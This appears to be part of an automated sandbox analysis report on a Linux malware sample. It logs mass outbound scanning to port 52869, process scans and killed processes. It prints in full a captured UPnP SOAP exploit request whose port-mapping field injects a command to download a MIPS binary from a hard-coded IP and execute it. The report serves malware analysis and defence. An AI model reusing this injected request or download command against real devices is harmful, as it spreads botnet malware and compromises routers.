    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.153.109.173:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.204.11.44:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.51.104.168:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.100.249.80:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.228.253.26:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.40.27.215:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.204.115.145:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.119.116.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.251.141.86:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.189.5.130:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.180.142.141:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.75.140.55:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.165.140.153:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.74.151.222:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.2.96.255:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.163.56.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.98.91.4:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.209.185.89:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.197.147.222:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.127.29.121:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.107.154.84:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.34.23.154:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.240.173.227:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.176.143.184:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.208.249.130:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.218.7.161:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.156.18.124:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.21.147.234:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.149.230.95:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.123.173.208:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.246.249.38:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.168.255.167:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.225.205.188:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.215.199.252:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.198.241.114:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.45.19.156:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.68.162.47:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.173.144.59:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.68.13.241:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.179.99.147:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.206.62.143:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.194.190.119:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.208.235.119:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.3.93.193:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.1.43.141:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.240.3.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.19.100.14:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.162.144.81:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.166.40.133:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.95.177.11:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.137.243.183:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.95.66.158:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.107.126.199:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.98.221.8:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.11.94.167:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.62.241.6:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.93.24.130:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.220.215.182:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.62.82.61:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.76.208.90:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.124.217.51:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.165.105.22:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.36.123.88:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.177.113.59:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.100.94.161:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.4.163.105:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.40.68.35:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.46.49.12:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.158.241.60:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.157.34.187:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.99.17.22:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.169.166.182:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 185.106.77.10:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 45.122.160.124:52869
    Source: global trafficTCP traffic: 192.168.2.23:21714 -> 91.113.61.52:52869
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)Socket: 0.0.0.0::0
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)Socket: 0.0.0.0::0
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)Socket: 0.0.0.0::23
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)Socket: 0.0.0.0::53413
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)Socket: 0.0.0.0::80
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)Socket: 0.0.0.0::52869
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)Socket: 0.0.0.0::37215
    Source: /usr/sbin/sshd (PID: 5310)Socket: 0.0.0.0::22
    Source: /usr/sbin/sshd (PID: 5310)Socket: [::]::22
    Source: unknownNetwork traffic detected: HTTP traffic on port 43928 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 42836 -> 443
    Source: unknownTCP traffic detected without corresponding DNS query: 188.181.24.218
    Source: unknownTCP traffic detected without corresponding DNS query: 102.248.79.222
    Source: unknownTCP traffic detected without corresponding DNS query: 223.53.124.218
    Source: unknownTCP traffic detected without corresponding DNS query: 114.109.170.198
    Source: unknownTCP traffic detected without corresponding DNS query: 131.45.203.91
    Source: unknownTCP traffic detected without corresponding DNS query: 82.84.243.232
    Source: unknownTCP traffic detected without corresponding DNS query: 185.50.100.59
    Source: unknownTCP traffic detected without corresponding DNS query: 219.74.104.158
    Source: unknownTCP traffic detected without corresponding DNS query: 1.223.158.5
    Source: unknownTCP traffic detected without corresponding DNS query: 129.238.192.240
    Source: unknownTCP traffic detected without corresponding DNS query: 74.95.137.170
    Source: unknownTCP traffic detected without corresponding DNS query: 46.155.114.159
    Source: unknownTCP traffic detected without corresponding DNS query: 71.161.219.246
    Source: unknownTCP traffic detected without corresponding DNS query: 200.250.254.232
    Source: unknownTCP traffic detected without corresponding DNS query: 41.114.145.38
    Source: unknownTCP traffic detected without corresponding DNS query: 143.122.112.109
    Source: unknownTCP traffic detected without corresponding DNS query: 199.3.143.46
    Source: unknownTCP traffic detected without corresponding DNS query: 79.116.25.57
    Source: unknownTCP traffic detected without corresponding DNS query: 83.78.12.183
    Source: unknownTCP traffic detected without corresponding DNS query: 157.200.68.35
    Source: unknownTCP traffic detected without corresponding DNS query: 126.96.35.203
    Source: unknownTCP traffic detected without corresponding DNS query: 207.224.255.8
    Source: unknownTCP traffic detected without corresponding DNS query: 173.152.22.42
    Source: unknownTCP traffic detected without corresponding DNS query: 62.183.207.45
    Source: unknownTCP traffic detected without corresponding DNS query: 174.129.81.116
    Source: unknownTCP traffic detected without corresponding DNS query: 43.117.15.16
    Source: unknownTCP traffic detected without corresponding DNS query: 85.232.114.56
    Source: unknownTCP traffic detected without corresponding DNS query: 98.99.229.56
    Source: unknownTCP traffic detected without corresponding DNS query: 192.163.22.145
    Source: unknownTCP traffic detected without corresponding DNS query: 103.239.68.75
    Source: unknownTCP traffic detected without corresponding DNS query: 18.101.32.105
    Source: unknownTCP traffic detected without corresponding DNS query: 193.37.19.138
    Source: unknownTCP traffic detected without corresponding DNS query: 219.132.88.22
    Source: unknownTCP traffic detected without corresponding DNS query: 218.218.56.210
    Source: unknownTCP traffic detected without corresponding DNS query: 212.215.202.162
    Source: unknownTCP traffic detected without corresponding DNS query: 14.239.173.119
    Source: unknownTCP traffic detected without corresponding DNS query: 173.188.254.44
    Source: unknownTCP traffic detected without corresponding DNS query: 219.124.156.175
    Source: unknownTCP traffic detected without corresponding DNS query: 52.248.187.108
    Source: unknownTCP traffic detected without corresponding DNS query: 62.117.131.228
    Source: unknownTCP traffic detected without corresponding DNS query: 122.147.246.124
    Source: unknownTCP traffic detected without corresponding DNS query: 1.36.101.87
    Source: unknownTCP traffic detected without corresponding DNS query: 203.122.201.243
    Source: unknownTCP traffic detected without corresponding DNS query: 179.67.211.86
    Source: unknownTCP traffic detected without corresponding DNS query: 98.211.151.205
    Source: unknownTCP traffic detected without corresponding DNS query: 200.55.156.108
    Source: unknownTCP traffic detected without corresponding DNS query: 148.51.88.20
    Source: unknownTCP traffic detected without corresponding DNS query: 9.209.116.200
    Source: unknownTCP traffic detected without corresponding DNS query: 222.19.59.48
    Source: unknownTCP traffic detected without corresponding DNS query: 137.0.24.63
    Source: zJk9UEOnQ7, 5241.1.000000003d7c595a.000000003a80a9d8.r-x.sdmpString found in binary or memory: http://37.0.9.202/bins/Hilix.mips
    Source: zJk9UEOnQ7, 5241.1.000000003d7c595a.000000003a80a9d8.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
    Source: zJk9UEOnQ7, 5241.1.000000003d7c595a.000000003a80a9d8.r-x.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
    Source: motd-news.20.drString found in binary or memory: https://ubuntu.com/blog/microk8s-memory-optimisation
    Source: unknownHTTP traffic detected: POST /picdesc.xml HTTP/1.1Host: 127.0.0.1:52869Content-Length: 630Accept-Encoding: gzip, deflateSOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMappingAccept: */*User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)Connection: keep-aliveData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 49 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 2f 4e 65 77 52 65 6d 6f 74 65 48 6f 73 74 3e 3c 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 34 37 34 35 31 3c 2f 4e 65 77 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 4e 65 77 50 72 6f 74 6f 63 6f 6c 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 34 34 33 38 32 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 60 63 64 20 2f 76 61 72 3b 20 72 6d 20 2d 72 66 20 6e 69 67 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 33 37 2e 30 2e 39 2e 32 30 32 2f 62 69 6e 73 2f 48 69 6c 69 78 2e 6d 69 70 73 20 2d 4f 20 6e 69 67 3b 20 63 68 6d 6f 64 20 37 37 37 20 6e 69 67 3b 20 2e 2f 6e 69 67 20 72 65 61 6c 74 65 6b 60 3c 2f 4e 65 77 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 4e 65 77 45 6e 61 62 6c 65 64 3e 31 3c 2f 4e 65 77 45 6e 61 62 6c 65 64 3e 3c 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 73 79 6e 63 74 68 69 6e 67 3c 2f 4e 65 77 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 30 3c 2f 4e 65 77 4c 65 61 73 65 44 75 72 61 74 69 6f 6e 3e 3c 2f 75 3a 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47451</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>`cd /var; rm -rf nig; wget http://37.0.9.202/bins/Hilix.mips -O nig; chmod 777 nig; ./nig realtek`</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></
    Source: ELF static info symbol of initial sample.symtab present: no
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)SIGKILL sent: pid: 936, result: successful
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)SIGKILL sent: pid: 936, result: no such process
    Source: classification engineClassification label: mal72.troj.lin@0/3@0/0
    Source: zJk9UEOnQ7Joe Sandbox Cloud Basic: Detection: clean Score: 0Perma Link
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/491/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/793/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/772/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/796/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/774/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/797/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/777/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/799/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/658/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/912/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/759/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/936/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/918/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/1/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/761/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/785/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/884/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/720/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/721/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/788/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/789/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/800/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/801/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/847/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5243)File opened: /proc/904/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/491/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/793/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/772/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/796/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/774/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/797/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/777/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/799/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/658/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/912/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/759/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/936/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/918/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/1/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/761/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/785/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/884/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/720/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/721/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/788/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/789/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/800/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/801/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/847/fd
    Source: /tmp/zJk9UEOnQ7 (PID: 5249)File opened: /proc/904/fd
    Source: /usr/bin/dash (PID: 5213)Rm executable: /usr/bin/rm -> rm -f /tmp/tmp.91tEJtbEWc /tmp/tmp.Zus0sicMvy /tmp/tmp.qH6x8mL5YT

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60692 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60698 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 60692
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 60698
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55222 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41092 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55228 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41098 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45572 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45576 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46890 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35552 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35558 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38512 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38520 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43654 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43668 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54094 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 47734 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47754 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35538 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36744 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54210 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37418 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53448 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53464 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 49568 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38354 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33570 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32934 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43220 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 43228 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43220
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 32934
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 43228
    Source: unknownNetwork traffic detected: HTTP traffic on port 52869 -> 32942
    Source: unknownNetwork traffic detected: HTTP traffic on port 40162 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55942 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46394 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 55954 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40182 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41252 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56190 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 41258 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58316 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58284 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 44326 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58288 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54224 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35158 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 56232 -> 52869
